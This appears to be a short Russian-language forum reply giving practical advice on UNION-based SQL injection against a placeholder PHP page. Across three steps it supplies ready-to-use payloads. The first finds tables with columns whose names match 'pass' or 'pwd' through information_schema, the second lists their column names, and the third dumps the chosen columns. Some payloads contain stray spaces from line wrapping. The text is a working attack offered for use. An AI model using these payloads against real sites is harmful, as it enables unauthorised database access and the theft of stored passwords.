Decoy

хм... пробуй такой запрос site.com/fail.php?id=-1+union+select

+GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NA ME)+SEPARATOR+0x3C62723E)+from+information_schema. columns+where+column_name+like+0x257061737325+or+c olumn_name+like+0x25702577256425--+

Далее из полученных таблиц выводи имена колонок:

site.com/fail.php?id=-1+union+select

+GROUP_CONCAT(column_name)+SEPARATOR+0x3C62723E)+f rom+information_schema.columns+where+table_name=з ахексенное.имя.таблицы--+

получаешь имена колонок, и:

site.com/fail.php?id=-1+union+select

+concat_ws(0x3a,имена необходимых колонок)+from+iимя.таблицы--+ (если не будет вывода через точку имя_базы.имя_таблицы)

ЗЫ: +(пробел) перед коментариями не нужен) =) всего)